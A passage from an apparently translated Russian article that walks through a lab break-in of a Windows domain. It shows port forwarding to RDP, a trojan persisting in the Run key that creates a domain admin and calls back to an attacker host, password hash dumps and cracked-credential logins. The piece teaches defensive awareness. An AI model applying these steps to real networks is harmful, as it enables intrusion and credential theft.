Службы Windows Terminal Services (использующие Remote Desktop Protocol) прослушивают порт 3389. Сканирование портов сервера базы данных показывает, что этот порт действительно открыт:
C:\warez>portscan 172.17.0.3
Port 172.17.0.3:135 open
Port 172.17.0.3:139 open
Port 172.17.0.3:445 open
Port 172.17.0.3:1433 open
Port 172.17.0.3:3389 open
Я не могу установить прямое соединение с сервером базы данных, потому что он относится к сети с NAT и недоступен из Интернета. Тем не менее, я могу добраться до него, запустив на Webсервере программу перенаправления трафика на другой порт, которая будет принимать трафик, поступающий Webсерверу через порт 443, и отправлять его SQL*серверу в порт 3389:
C:\warez>socketpipe 443 88 3389 172.17.0.3
Открыв этот сокет, я просто устанавливаю соединение с Webсервером с помощью клиента Terminal Services:
mstsc /v:192.168.2.30:443
Теперь, когда я могу войти в систему под учетной записью пользователя _ids, я получаю полный доступ к GUI (который, как считают некоторые, уступает командной строке, но это не имеет значения).
Как бы то ни было, но контроллер домена еще не пал. Для захвата контроля над ним я воспользуюсь собственным троянским конем. Сначала я зарегистрирую его на Webсервере (172.17.0.1), используя соединение Terminal Services:
c:\warez>EvilTrojan -r 172.17.0.1 -a 192.168.2.112
Троянский конь регистрирует себя в разделе реестра HKLM\Software\Microsoft\Windows\CurrentVersion\Run и поэтому будет запускаться при каждом входе пользователя в систему. Если пользователь окажется администратором домена, троянский конь создаст в домене новую учетную запись пользователя и добавит ее в группу администраторов домена. Если ему это удастся, он запустит службу Messenger и отправит мне (в данном случае по адресу 192.168.2.112) административное оповещение. Затем, чтобы скрыть следы, он удалит себя из раздела Run. Все это произойдет в то время, пока администратор будет входить в систему, и тот ничего не заметит. В итоге в системе останется единственный признак того, что случилось чтото неподобающее - файл avcheck.exe в каталоге Windows.
Конечно, можно реализовать и другие способы тайной отправки уведомлений. В реальности хакеры часто используют для этого IRC (Internet Relay Chat). Уведомлением может быть даже не вызывающая подозрений HTTPтранзакция. Теперь мне осталось только дождаться, когда в систему войдет администратор домена, и я получу столь нужное мне уведомление:
C:\>nc -l -p 80
Succeeded in adding a user.
User: attacker$
Password: "Uare0wn3d!"
Domain: PYN-DMZ
DC: PYN-DMZ-DC
Получать уведомления можно как угодно. Мой троянский конь просто открывает сокет, связанный с 80м портом хоста хакера и отправляет уведомление в этот порт. Уведомления можно шифровать, кодировать, отправлять с применением практически любых портов и протоколов и изменять самыми разными способами. Как я уже говорил, для получения уведомлений часто используют каналы чатов IRC.
Итак, домен DMZ взломан, и я захватил контроллер домена. Помните, что это хранитель ключей от царской сокровищницы, в которой помимо прочего можно найти базу данных учетных записей пользователей. Пытаясь воспользоваться обретенной мощью, я снова прошу контроллер домена соединиться со мной, чтобы запустить командную оболочку в удаленном режиме. После этого я продолжаю изучать среду, в которой очутился
(листинг 8).
Листинг 8. Информация о хосте PYN-DMZ-DC, выведенная ipconfig
C:\warez>ipconfig /all
Windows IP Configuration
Host Name . . . . . . . . . . . . : PYN-DMZ-DC
Primary Dns Suffix . . . . . . . : PYN-DMZ.LOCAL
Node Type . . . . . . . . . . . . : Unknown
IP Routing Enabled. . . . . . . . : Yes
WINS Proxy Enabled. . . . . . . . : No
DNS Suffix Search List. . . . . . : PYN-DMZ.LOCAL
Ethernet adapter CorpNet:
Connection-specific DNS Suffix . :
Description . . . . . . . . . . . : Intel 21140-Based PCI
Fast Ethernet Adapter
(Generic) #2
Physical Address. . . . . . . . . : 00-03-FF-06-3E-F0
DHCP Enabled. . . . . . . . . . . : No
IP Address. . . . . . . . . . . . : 10.1.2.16
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . :
DNS Servers . . . . . . . . . . . : 172.17.0.2
Ethernet adapter DMZNet:
Connection-specific DNS Suffix . :
Description . . . . . . . . . . . : Intel 21140-Based PCI
Fast Ethernet Adapter
(Generic)
Physical Address. . . . . . . . . : 00-03-FF-07-3E-F0
DHCP Enabled. . . . . . . . . . . : No
IP Address. . . . . . . . . . . . : 172.17.0.2
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 172.17.0.1
DNS Servers . . . . . . . . . . . : 172.17.0.2
Как видите, данная система включает два сетевых адаптера, один из которых подключен к корпоративной сети, а второй - к DMZ; повидимому, это означает, что система выполняет функции маршрутизатора между двумя сетями. Прежде чем я этим воспользуюсь, я могу получить дампы учетных записей всех пользователей, хранящихся на контроллере домена.
Помните, я говорил, что контроллер домена хранит около 15 учетных записей пользователей? Терять время нельзя, поэтому я лучше создам дампы хэшей паролей и попробую взломать их. Так как у меня есть привилегии администратора, для получения дампов достаточно запустить очень популярную программу PWDump (
листинг 9).
Листинг 9. Информация, выведенная pwdump2
C:\warez>pwdump2.exe
Administrator:500:624aac413795cdc1ff17365faf1ffe89 :b9e0c
fceaf6d077970306a2fd88a7c0a:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe 0
d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:28237c 666
e4bb3cc96d670cadca1593b:::
SUPPORT_388945a0:1001:aad3b435b51404eeaad3b435b51
404ee:cd072175763b0d5b3fbb152f57b96e7c:::
FAjenstat:1106:daf058ae79085db217306d272a9441bb:c4 3325
fdf77cafacf02f6e3eaa7f5020:::
AAlberts:1107:1df8f06dcf78bb3aaad3b435b51404ee:240 8f92a
b284046ddcc6952755f449e2:::
HAcevedo:1108:dbff4b96d021df2f93e28745b8bf4ba6:bbd 9477
810308a0b676f3cda91f10539:::
MAlexander:1109:d278e69987353c4c837daf3f2ddd5ca3:2 c67b
571425751747e7ae379fefe9fcc:::
KAkers:1110:693de7f320aae76293e28745b8bf4ba6:fb853 a32
ccd2b92b43639b0e7d29e09d:::
TAdams:1111:ea03148efb24d7fc5be30f58d2a941d5:18cce 97e
e181d42be654133658723813:::
KAbercrombie:1112:6c32f38de08f49f026f8092a33daaf05 :a88b
78471261477e26d9e4c11571b127:::
Sculp:1113:49901659efc5e1d6aad3b435b51404ee:d98630 0c
7c0c33d3cc5417dbac6f90db:::
SAbbas:1114:d6855d70abc371c2b77b4e7109416ab8:363c9 3e
6be7a5cb001e7ad542c292f26:::
...
По умолчанию Windows хранит два представления паролей: "хэш" LM (на самом деле это вовсе не хэш) и хэш Windows NT. Опираясь на полученные данные, я могу сказать, что система, с которой мы имеем дело, хранит хэши LM. Это должно обрадовать хакера, так как хэши LM взломать гораздо легче. Передав дамп программе взлома паролей, я могу взломать большинство хранящихся в этой системе паролей за сутки. На деле, проведя комбинированную атаку, я взломал три пароля менее чем за минуту. Возможно, настоящему взломщику это удалось бы сделать еще быстрее. Есть инструменты, которые взламывают пароли быстрее за счет использования большего объема памяти.
Получив пароли, я должен узнать, где они используются. Информация о системах сети 172.17.0/24 у меня имеется, поэтому посмотрим, что есть в сети 10.1.2/24:
C:\warez>discoverHosts 10.1.2
Reply from 10.1.2.16: bytes=32 time<1ms TTL=128
Reply from 10.1.2.17: bytes=32 time=54ms TTL=128
Система с адресом 10.1.2.16 - это, как мы уже знаем, контроллер домена центра данных, а вот хост с адресом 10.1.2.17 нам неизвестен. Это дело надо исправить:
C:\warez>GetSystemInfo 10.1.2.17
Server info on 10.1.2.17
Name: PYN-CORPDC
Domain: PYN
Version: 5.2
Platform ID: 500
Comment:
Server Flags:
Workstation
Server
Domain Controller
Time source
Итак, это контроллер домена, который я изначально искал. Пока могу лишь сказать, что он работает под управлением Windows Server 2003. Возможно, идентификация пользователей этой системы даст мне дополнительную информацию (
листинг 10).
Листинг 10. Информация о корпоративном контроллере домена, выведенная dumpinfo
C:\warez>dumpinfo 10.1.2.17
The Administrator is: PYN\Administrator
Users on PYN-CORPDC:
RID 1000 PYN\HelpServicesGroup an Alias
RID 1001 PYN\SUPPORT_388945a0 a User
RID 1002 PYN\TelnetClients an Alias
RID 1003 PYN\PYN-CORPDC$ a User
RID 1104 PYN\FAjenstat a User
RID 1105 PYN\AAlberts a User
RID 1106 PYN\HAcevedo a User
RID 1107 PYN\MAlexander a User
RID 1108 PYN\KAkers a User
RID 1109 PYN\TAdams a User
RID 1110 PYN\KAbercrombie a User
RID 1111 PYN\Sculp a User
RID 1112 PYN\SAbbas a User
RID 1113 PYN\MAllen a User
RID 1114 PYN\JAdams a User
RID 1115 PYN\SAlexander a User
RID 1116 PYN\HAbolrous a User
RID 1117 PYN\PAckerman a User
RID 1118 PYN\GAlderson a User
...
Share Type Comment
IPC$ Unknown Remote IPC
NETLOGON Disk Logon server share
ADMIN$ Special Remote Admin
SYSVOL Disk Logon server share
C$ Special Default share
Administrators:
Unable to enumerate administrators
ERROR: Access Denied
Список получился довольно большой, причем в нем встречаются и наши старые знакомые, учетные записи которых зарегистрированы и на контроллере домена DMZ. В их число входят пользователи, пароли которых я уже взломал. Теперь я могу или продолжить сбор информации, или просто опробовать в деле взломанные учетные записи. Угадайте с трех раз, что выберет хакер:
C:\warez>net use \\pyn-corpdc\c$ /u
yn\GAlderson "yosemiTe^"
The command completed successfully.
Вот и все: сеть полностью взломана, и с ней можно делать что угодно. Реальный хакер мог бы, например, скопировать из нее конфиденциальную информацию, добавить себя в платежную ведомость, использовать эту сеть для атак на другие сети и т. д. Мы получили полный неограниченный доступ ко всей сети contoso.com.
Заключение
В данной статье я описал возможный способ взлома сети Windows. Спешу заявить, что сети Windows защищены не хуже, чем любые другие. Хотя конкретные атаки, рассмотренные в этой статье, уникальны для Windows, после небольших изменений методик и выбора других инструментов стала бы возможной аналогичная атака и на сеть, развернутую на другой платформе. Проблема не в самой платформе, а в методах ее защиты. Все платформы можно защитить, но и все сети, спроектированные и реализованные недостаточно грамотно, можно взломать. Если сеть реализована плохо, никакая платформа ее не спасет.
Похожие темы
Древовидный вид